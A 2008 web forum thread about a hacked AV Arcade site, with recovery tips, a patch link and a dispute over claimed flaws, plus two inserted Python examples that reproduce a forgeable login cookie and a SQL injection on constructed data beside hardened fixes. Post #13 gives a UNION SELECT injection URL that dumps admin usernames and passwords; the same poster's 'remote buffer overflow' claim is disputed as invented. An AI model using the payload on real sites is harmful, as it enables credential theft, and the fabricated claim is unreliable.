
My site has been hacked - what do I do?

Discussion in 'Security' started by urbt, Jul 19, 2008.

  1. #1
    My site: http://www.koolkidz.co.uk has been hacked. I have no idea where the vulnerability came from but it's AvArcade v3 if that's any help. Please help, I have no idea what to do!
     
    urbt, Jul 19, 2008
  2. And! (Active Member) #2
    First thing, is to not take it personally, because you're not the only AVArcade site to get hacked in the last couple of days. There seem to be hundreds of AVArcade sites that have been hacked, including one of mine. The people on Zone-H have hacked over 1,000 sites in the last 2 days http://www.zone-h.org/index.php?option=com_attacks&Itemid=45 Don't click on any of the sites that have been hacked though, as there are some that have been planted with trojans.


    You will probably not be able to log in to your admin, as it is likely your password has been changed, so you will have to sign up for a new account and use phpMyAdmin to give your new account admin rights.
    Log in to admin and put your site back to where it was, then use phpMyAdmin to remove admin rights, or you could try what I did, and password protect my admin folder with a ridiculously long password.


    There will probably be more info about this vulnerability later?
     
    And!, Jul 19, 2008
  3. Andy-V (Active Member) #3
    Hi there,

    Everyone should download this file: avscripts.net/avarcade/securityfix.zip

    And then upload it to your main AV Arcade directory. I hope this plugs the exploit. Please tell me if you use this new file and still get hacked.

    Andy
     
    Andy-V, Jul 19, 2008
  4. And! (Active Member) #4
    Thanks for the swift support :)
    You're doing a great job Andy!
     
    And!, Jul 19, 2008
  5. Andy-V (Active Member) #5
    Andy-V, Jul 19, 2008
  6. Yousif (Banned) #6
    Updates mean nothing if you don't understand what caused the insecurity. Firstly, this script was flawed because of the way cookies were issued. Gaining administrative access was easy because the cookie values can be manipulated. The PHP script that "validates" the cookie value only checks the ID, and not the legitimate authentication/authorization. I've also audited the source code and it appears that a remote buffer overflow exploit can be executed. Yet another exploit I found was through its SQL database. You are able to SQL inject commands that allow you to dump the ID (login information) from the form at view_page.php. I would suggest developing your own custom script or PM me for a sample security assessment. It costs nothing and it's able to tell you whether the web applications on your server are stable/secure or vulnerable.
     
    Yousif, Jul 19, 2008
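An added example, not code from AV Arcade or from anyone in this thread, illustrating the first flaw the post above describes: a login cookie that carries only a user ID and is "validated" by checking that such an ID exists, beside a cookie whose ID is bound to a server-side secret with an HMAC so the client cannot rewrite it. The user table, the cookie layout and the field names are assumptions made for the illustration.

```python
# Added example, not AV Arcade code. Demonstrates an ID-only login cookie
# that any client can rewrite, and an HMAC-bound cookie that cannot be
# forged without the server's secret. USERS and the cookie layout are
# assumptions for illustration.
import hashlib
import hmac
import secrets

# Constructed stand-in for the application's user table (assumption).
USERS = {
    1: {"username": "admin", "is_admin": True},
    2: {"username": "player", "is_admin": False},
}

# Per-deployment secret that lives only on the server. Rotating it after
# a compromise invalidates every outstanding cookie at once.
SECRET = secrets.token_bytes(32)


def vulnerable_current_user(cookie):
    """Weak check: trusts whatever ID the client sent and only confirms
    that a user with that ID exists. Setting the cookie to '1' is admin."""
    if not cookie.isdigit():
        return None
    return USERS.get(int(cookie))


def issue_cookie(uid, secret=SECRET):
    """Cookie value is '<uid>.<hex HMAC-SHA256 over the uid string>'."""
    tag = hmac.new(secret, str(uid).encode(), hashlib.sha256).hexdigest()
    return f"{uid}.{tag}"


def hardened_current_user(cookie, secret=SECRET):
    """Accepts the ID only if the MAC verifies under the server secret, so a
    rewritten ID or a guessed tag is refused. compare_digest keeps the tag
    comparison constant-time."""
    uid_str, sep, tag = cookie.partition(".")
    if not sep or not uid_str.isdigit():
        return None
    expected = hmac.new(secret, uid_str.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    return USERS.get(int(uid_str))


def forge_admin_from(cookie):
    """What an attacker holding a legitimate low-privilege cookie would try:
    keep the tag, swap the ID for the admin's."""
    _, _, tag = cookie.partition(".")
    return "1." + tag


if __name__ == "__main__":
    print(vulnerable_current_user("1"))                      # admin record
    print(hardened_current_user("1"))                        # None
    legit = issue_cookie(2)
    print(hardened_current_user(legit)["username"])          # player
    print(hardened_current_user(forge_admin_from(legit)))    # None
```

A MAC over the ID stops forgery but not replay: a stolen cookie stays valid until the secret is rotated, so a real deployment would add an expiry to the signed payload or use a server-side session ID that can be revoked. For the incident in this thread, rotating the secret (or session store) after cleanup is the step that logs the intruder out.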
  7. Andy-V (Active Member) #7
    Yousif, very good. You might even convince people into using your 'services' like that.

    Heh.
     
    Andy-V, Jul 21, 2008
  8. Ben-AceofTech (Active Member) #8
    I know many here already gave you the cure, but it's usually very useful to get in contact with your hosting company with something like this. One of my old sites on a phpBB3 board had an exploit. Guy got in, had ACP and FTP access... luckily I had my host put my site offline just long enough for me to find the fix and put it into effect before the hacker could do much damage.
     
    Ben-AceofTech, Jul 21, 2008
  9. Yousif (Banned) #9
    Are you trying to make fun of me?
     
    Yousif, Jul 21, 2008
  10. Andy-V (Active Member) #10
    Well, you looked through the source code apparently and found an SQL injection vulnerability in view_page.php. Now are you totally sure you downloaded the script, and found that vulnerability?

    Show me then, in that file, where the vulnerability lies.
     
    Andy-V, Jul 21, 2008
  11. Yousif (Banned) #11
    Yes, I'm sure I looked through the source code. It's publicly available at no cost.
     
    Yousif, Jul 21, 2008
  12. Andy-V (Active Member) #12
    Well then show me the vulnerability, prove that YOU really did find a flaw in view_page.php.
     
    Andy-V, Jul 22, 2008
  13. Yousif (Banned) #13
    Exploit:
    /index.php?task=view_page&id=-1%20UNION%20SELECT%201,username,password%20FROM%20ava_users%20WHERE%20id=1
    Example:
    http://www.yourgame.org/index.php?t...1,username,password FROM ava_users WHERE id=1

    ^ Remote SQL Injection. Don't sit around here and doubt me. I highly suggest you do your work before you run your mouth. This is a forum, and as a community, we're here to establish help. If you feel like attacking people personally, go elsewhere.
     
    Yousif, Jul 22, 2008
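The UNION payload above, worked through as an added example that is not AV Arcade code and was not posted by anyone in this thread, against a constructed in-memory SQLite database: a page-viewing query assembled by string concatenation returns the user row the UNION appends, while a parameterized query with type validation rejects the same input. The three-column ava_pages table, the ava_users columns and the sample rows are assumptions chosen to match the three columns the payload selects; the example shows the injection class, and says nothing about which AV Arcade version, if any, is affected.

```python
# Added example, not AV Arcade code. Replays the UNION payload from the
# post above against a constructed in-memory SQLite database. The ava_pages
# schema, the ava_users schema and the sample rows are assumptions.
import re
import sqlite3
from urllib.parse import parse_qs

# The query string from the posted URL, minus the leading path.
POSTED_QUERY = ("task=view_page&id=-1%20UNION%20SELECT%201,username,password"
                "%20FROM%20ava_users%20WHERE%20id=1")


def build_db():
    """Constructed schema: the payload selects three columns, so the
    left-hand SELECT it is unioned onto must also return three columns."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE ava_pages (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE ava_users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO ava_pages VALUES (1, 'About', 'Welcome to the arcade');
        INSERT INTO ava_users VALUES (1, 'admin', 'constructed-password-hash');
    """)
    return db


def id_from_query(qs):
    """Pulls id= out of the query string the way $_GET['id'] would:
    URL-decoded and untyped, so the spaces and keywords come through."""
    return parse_qs(qs)["id"][0]


def view_page_vulnerable(db, page_id):
    """Concatenates the parameter into the SQL text, so the client's input
    is parsed as SQL syntax rather than treated as a value."""
    sql = "SELECT id, title, body FROM ava_pages WHERE id=" + page_id
    return db.execute(sql).fetchall()


def view_page_fixed(db, page_id):
    """Checks the type first, then binds the value; nothing the client sends
    can change the shape of the statement."""
    if not re.fullmatch(r"-?\d+", page_id):
        raise ValueError("id must be an integer")
    return db.execute(
        "SELECT id, title, body FROM ava_pages WHERE id=?", (int(page_id),)
    ).fetchall()


if __name__ == "__main__":
    db = build_db()
    injected = id_from_query(POSTED_QUERY)
    print(injected)
    print(view_page_vulnerable(db, "1"))       # the About page
    print(view_page_vulnerable(db, injected))  # the admin's credential row
    try:
        view_page_fixed(db, injected)
    except ValueError as err:
        print("rejected:", err)
```

The `-1` in the payload makes the left-hand SELECT match nothing, so the only row the page renders is the one the attacker appended; with three columns in the real SELECT that row lands in the page's title and body fields. Binding the parameter fixes the query, and rejecting non-integer input on top of that gives a cheap log signal when someone probes.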
  14. billy786 (Peon) #14
    Always keep a backup of your website/blog you never know when it can come in handy ;)
     
    billy786, Jul 22, 2008
  15. Andy-V (Active Member) #15
    Yes, this would be an impressive find... but you are almost a year late. You see, you haven't looked at the source have you? You just googled AVA exploits and found a page all about view_page.php. This was an exploit found in version 2 of AV Arcade, this is now version 3.1.4.

    Try the link on AVA v3 sites, it doesn't do a thing. If you had looked at the source code, you would have seen it was fixed. Same goes with the admin cookie exploit.

    And as for remote buffer overflow exploit... well, the word 'fabrication' comes to mind.
     
    Andy-V, Jul 23, 2008
  16. InFloW (Peon) #16
    Do you even know what a buffer overflow is? It is when data (a variable) is too large for its allocated memory and no bounds checks are in place, resulting in it writing to memory adjacent to it.

    If this sort of exploit existed in a PHP script it would be an issue with PHP itself.
     
    InFloW, Jul 23, 2008
  17. Yousif (Banned) #17
    Don't sit here and teach me anything like that again. If you ever disrespect me again, I can assure you that if you want to start something personal with me, you'll run along crying. Why don't you PM me your IP? I'm here to help people out, don't mess with someone who has a bigger authority than you. Someone who can teach you a lesson, believe it or not. I'll be expecting your PM.
     
    Yousif, Jul 23, 2008
  18. Yousif (Banned) #18
    I'm a year late? The source code is freely available. Pay attention to what I say because I'm not here to con you. I downloaded the source code to his older version, found these issues and then confirmed they existed with the authors who reported them. They were there, and I was able to find them. I'm not "late" in anything. If it's patched, well duh. But what he had was not secure.
     
    Yousif, Jul 23, 2008
  19. Andy-V (Active Member) #19
    His version was still version 3. The problem was fixed in a later version of v2.

    If you had downloaded AVA even within the last year, you would have gotten the secure version.

    You simply went to this website and copied the information. You even copied the exact link including "yourgame.org".

    And you completely invented the 'remote buffer overflow exploit', because there is no such thing concerning php.

    You've been caught out. So stop with your stupid lies now and go occupy yourself with something worthwhile.
     
    Andy-V, Jul 23, 2008
  20. hwmax (Peon) #20
    This. I'd recommend making backups of your DB and uploaded files etc. every day, or more often if possible. You can always restore; you'll be kicking yourself if it happens again.
     
    hwmax, Jul 23, 2008